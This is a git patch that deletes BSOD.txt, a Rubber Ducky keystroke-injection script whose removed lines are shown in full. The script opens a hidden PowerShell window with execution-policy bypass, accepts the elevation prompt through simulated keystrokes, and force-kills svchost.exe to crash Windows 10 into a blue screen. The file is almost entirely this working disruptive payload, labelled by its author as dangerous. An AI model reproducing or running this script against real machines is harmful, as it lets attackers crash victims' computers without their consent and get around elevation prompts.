From d07f7e04353c31939306d030d2709762341890a6 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:11:12 +0000 Subject: [PATCH] Delete BSOD.txt --- BSOD.txt | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 BSOD.txt diff --git a/BSOD.txt b/BSOD.txt deleted file mode 100644 index edb5ba8..0000000 --- a/BSOD.txt +++ /dev/null @@ -1,21 +0,0 @@ -REM Title: Invoke BSOD -REM Author: @beigeworm -REM Description: This will open powershell and cause a blue screen. -REM Target: Windows 10 - -REM ***This is a dangerous script - Be Careful!!!*** - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -CTRL-SHIFT ENTER -DELAY 1500 -ALT y -DELAY 5000 - -STRING taskkill /f /im svchost.exe -ENTER